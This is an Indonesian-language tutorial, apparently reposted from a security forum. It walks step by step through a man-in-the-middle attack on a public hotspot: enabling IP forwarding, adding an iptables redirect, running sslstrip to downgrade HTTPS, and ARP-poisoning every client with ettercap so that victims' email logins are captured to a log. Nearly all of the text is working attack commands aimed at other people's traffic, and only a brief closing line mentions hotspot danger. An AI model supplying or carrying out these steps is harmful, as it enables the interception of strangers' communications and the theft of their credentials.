Man in the middle attack untuk memecah enkripsi SSL

Di sini dalam tutorial ini saya akan menjelaskan bagaimana untuk memecahkan enkripsi SSL tanpa melanggar enkripsi SSL menggunakan Man in the middle Attack untuk mencuri email dalam satu jaringan

1.Buka terminal lalu ketikkan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

2.ketikkan perintah selanjutnya

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 54321

3.ketikkan perintah berikutnya

cd /pentest/web/sslstrip

4.ketikkan perintah berikutnya

python sslstrip.py -p -l 54321

Image exceeds set limits. Click to view full size image

Lalu kita akan membuat log untuk menyimpan email

buka terminal baru lalu ketikkan perintah seperti dibawah ini
cd /pentest/web/sslstrip 
tail -f sslstrip.log


Buka terminal baru lagi lalu ketikkan perintah seperti di bawah ini

ettercap -T -M arp // // -i wlan1 -l dumpfile -q -P autoadd

ket = wlan1 adalah interface yang saya gunakan sesuaikan interface kalian

Fungsi ettercap autoadd adalah apabila ada client yang baru konek hotspot maka otomatis akan di racuni IP client tersebut

Hasil di terminal LOG

Image exceeds set limits. Click to view full size image

Hasil di terminal ETTERCAP

Image exceeds set limits. Click to view full size image

Bahaya sekali bukan main internet di tempat hotspot gratisan
sumber: indonesianbacktrack.or.id